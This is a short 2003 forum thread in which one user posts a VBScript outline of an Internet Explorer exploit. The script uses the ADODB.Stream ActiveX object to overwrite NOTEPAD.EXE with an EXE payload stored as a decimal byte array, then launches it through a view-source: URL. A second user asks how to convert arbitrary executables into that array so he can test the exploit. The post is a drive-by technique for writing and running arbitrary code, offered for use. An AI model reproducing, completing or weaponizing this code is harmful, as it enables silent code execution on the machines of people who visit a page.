this has potential also, shows existence of files accurately
chris105
Nov 19 2003, 06:07 PM
CODE
Description: Use ADODB.Stream ActiveX to overwrite NOTEPAD.EXE, then launch the new NOTEPAD.EXE by launching view-source protocol URL.
HTTP-EQUIV at malware made this.
(in the demo, language="vbs": jelmersArray stores content of payload EXE file: jelmersArray= array(77,90, ... 63,63,63) (77=0x4D, 90=0x5A) Adodb.Stream overwrites NOTEPAD.EXE: set jelmer = CreateObject("Adodb.Stream") jelmer.Type = adTypeText jelmer.Open jelmer.WriteText toString(jelmersArray) jelmer.Position = 0 jelmer.Type = adTypeBinary jelmer.Position = 2 bytearray = jelmer.Read jelmer.Close malware.savetofile([Possible location of NOTEPAD.EXE]), adSaveCreateOverWrite view-source protocol URL makes IE launch our NOTEPAD.EXE: document.location="view-source:"+document.location.href )
IS that a bit like the media player exploit do you suppose??
matiano
Nov 21 2003, 11:34 PM
i would like test the exploit which chris105 has posted but (you can find this @what´s link)... but how convert any exe file to decimal, which pasted here ---> jelmersArray= array(CONVERT DECIMAL CODE)
anyone know an useful tool ?
i have tried hackman but its copied the offsets too
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
